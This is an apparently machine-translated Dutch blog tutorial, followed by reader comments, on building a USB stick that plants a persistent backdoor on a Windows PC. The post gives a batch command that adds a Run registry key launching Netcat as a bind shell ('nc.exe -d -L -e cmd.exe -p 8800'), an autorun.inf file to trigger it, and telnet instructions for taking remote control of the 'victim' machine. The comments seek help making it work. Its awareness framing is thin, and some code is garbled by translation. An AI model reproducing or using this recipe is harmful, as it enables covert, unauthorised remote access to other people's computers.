Laatste update: 10 juli 2023
In eerdere artikelen hebben we gezien hoe u een USB-rootkitsleutel die wachtwoorden herstelt van een computer onder Windows. Vandaag zullen we zien hoe je een USB-sleutel maakt die een achterdeur op een machine opent Windows.
Deze rootkit wordt automatisch uitgevoerd, maakt een achterdeur op een pc Windows en stelt u in staat om op afstand de controle overnemen.
Zoals gewoonlijk dedoel van deze tutorial, is om bedrijfsleiders te laten zien in welke mate het gebruik van sleutels USB kan gevaarlijk zijn. Wat voor bedrijven geldt, geldt niet minder voor particulieren.
Neem de controle over een pc op afstand
Om op afstand de controle over een pc over te nemen met een USB-sleutel, moet u de bovenstaande stappen volgen:
Download de Netcat-tool
Eerst maken we een nieuwe map op onze USB-stick. Dan gaan we downloaden netcat, een hulpprogramma voor het openen van netwerkverbindingen, ofwel UDP of TCP.
U kunt ook de tool Cryptcat, de Netcat-kloon, gebruiken, op voorwaarde dat deze laatste zijn communicatie versleutelt.
Netcat downloaden voor windows
Na het downloaden van Netcat, unzip het in de recent aangemaakte map.
Een .bat-script maken
Vervolgens zullen we een bestand maken achterdeur.bat. Dit kleine bestand heeft twee doelen:
- Kopieer de Netcat-bestanden naar de map System32 van de doelcomputer.
- Voeg een tekenreekswaarde toe aan het register van de slachtoffer-pc zodat onze achterdeur bij elke opstart kan worden gestart.
Om dit te doen, zullen we een nieuw tekstdocument maken met de teksteditor Kladblok of een andere teksteditor en de onderstaande code plakken:
REG TOEVOEGEN « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v “backdoor” /t “REG_SZ” /d “%SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800”
Een autorun-bestand maken
Nu moeten we het bestand maken autorun.inf.
In deze stap zullen we een nieuwe optie maken in het venster dat verschijnt bij het plaatsen van een USB, waarmee we (eenmaal erop klikken) onze achterdeur op de doelcomputer kunnen installeren.
Open hiervoor een nieuw tekstdocument en voer deze code in:
open=achterdeur.bat
ACTION=”geef een naam aan deze actie”
Ten slotte slaan we het bestand op onder de hoofdmap van de sleutel onder de naam autorun.inf
Implementeer de gecreëerde achterdeur
Nadat u de USB-sleutel hebt geplaatst, kunt u vanaf elke machine verbinding maken met de computer van het slachtoffer met de volgende opdracht:
192.168.1.17 geeft het IP-adres aan van de externe machine die u moet vervangen. En 8800 is de poort die moet worden gebruikt om verbinding te maken.
En daar ga je! Met deze techniek kun je op afstand de controle over een pc overnemen. U kunt doen wat u wilt: bestanden openen, een zoekopdracht starten, een programma uitvoeren...
Hier is een lijst met opdrachten om de machine op afstand correct te manipuleren: Bestellingen lezen Windows.
Om uit te loggen typt u "uitloggen".
Maak er goed gebruik van.
Ik weet niet goed hoe ik verbinding moet maken
Zelfs als we de sleutel verwijderen, zijn we nog steeds verbonden?
En ook op welk niveau zet hij de code?
Naar opdrachtprompt of netcap?
hallo is er een manier om hetzelfde te doen, maar dan aan windows 10?
Hallo wanneer ik verbinding wil maken met netcat of iets anders, vraagt het me om een code en ik kan het niet vinden
Ik begrijp het niet. Waar vind je de haven? en waar de opdracht telnet ... in de cmd in te voegen?
hallo, de map autorun.inf werkt niet, ik sla het op als ,
autorun.inf en ik zet het direct op mijn usb-sleutel, maar bij het invoegen
usb-sleutel, wordt niets weergegeven. een beetje hulp alstublieft ??En het commando telnet 192.168.1.17 880, je moet het in CMD typen ??
Je bent er zeker van windows 10 volgens mij wel? OMDAT OP windows 10 Ze hebben .inf verwijderd omdat dit de deur openzette voor alle hackers
de links zijn dood
Neen.
Ahmad hallo,
Zeer interessant artikel, alleen een probleem het werkt niet, ik leg mijn probleem uit.
Ik heb een oude pc xp waarop ik de achterdeur heb geïntroduceerd door je tutorial tot op de letter te volgen.
Wanneer ik telnet start onder ubuntu, kan deze het ip-adres van de xp . niet oplossen
telnet: kon xxx.xxx.x.xx niet oplossen…8800/telnet: naam of dienst niet
een ipconfig in de xp-console bevestigt mij echter dat het de juiste is.
Enig idee?
Bij voorbaat dank en een fijne avond
Zou daar niet een backslash moeten zijn?
kopieer *.* "%SYSTEMROOT%/System32"
kopieer *.* "%SYSTEMROOT%/System32"
kopieer *.* "%SYSTEMROOT%/System32"
??
Anders ontbreekt het alleen om het te configureren om het IP-adres van de doelcomputer te stelen 🙂
Hallo, ik ben geïnteresseerd in computerbeveiliging en ik zou graag willen weten of we een achterdeur in een computer maken. Dit vormt een probleem omdat we hier een poort openen op 8800, zodat iedereen er verbinding mee kan maken als ze verzoeken verzenden en de poort zien?
dank u
Hallo allemaal . Excuseer me voor het feit dat ik op afstand volledige toegang tot deze computer heb, heb ik internet nodig?
Precies, je hebt een internetverbinding nodig.
Hallo, wanneer ik de opdracht in NetCat invoer, retourneert het programma "lookup failed errno 1004 NO_NATA" zoiets als dit ... Kun je me alsjeblieft helpen?
Hallo. Ik heb een klein probleem met deze achterdeur. Ik heb elke stap van de procedure gevolgd, maar wanneer ik mijn USB-sleutel op een andere computer steek, verschijnt er geen optie om NetCat te openen en toegang te krijgen tot mijn eigen computer. Wat moet ik dan doen? Dank u voor uw antwoord !
Hallo,
U moet de draagbare software "putty" installeren.
In "ip-adres": het ip-adres van de doelcomputer
In "poort": 8800
En in "verbindingstype": telnet
Moet de pc absoluut draaien om dit te gebruiken?
Hallo, toen ik de bestanden om de achterdeur te maken op de USB-sleutel plaatste, werden al mijn documenten omgezet in snelkoppelingen, ze zijn niet langer bruikbaar. HELP MEEEEEEEEEEEE!!
Ik heb geprobeerd toegang te krijgen tot mijn XP-machine door de procedure te volgen, maar het werkt niet... zelfs het uitschakelen van de firewall en antivirus
Kunt u mij de foutmelding geven die verschijnt wanneer u verbinding probeert te maken met telnet?
Vooral ik zou graag willen weten hoe ik het ip-adres van de pc kan verkrijgen, welke moet de achterdeur installeren?
Als u het ip-adres van een pc in een lokaal netwerk wilt krijgen, opent u gewoon de cmd en typt u de opdracht net view nadat u de machinenaam hebt gepingd.
Anders, als je de pc in handen hebt, typ je gewoon in de opdrachtprompt: ipconfig en je hebt het IP-adres
Wat is het commando in ubuntu?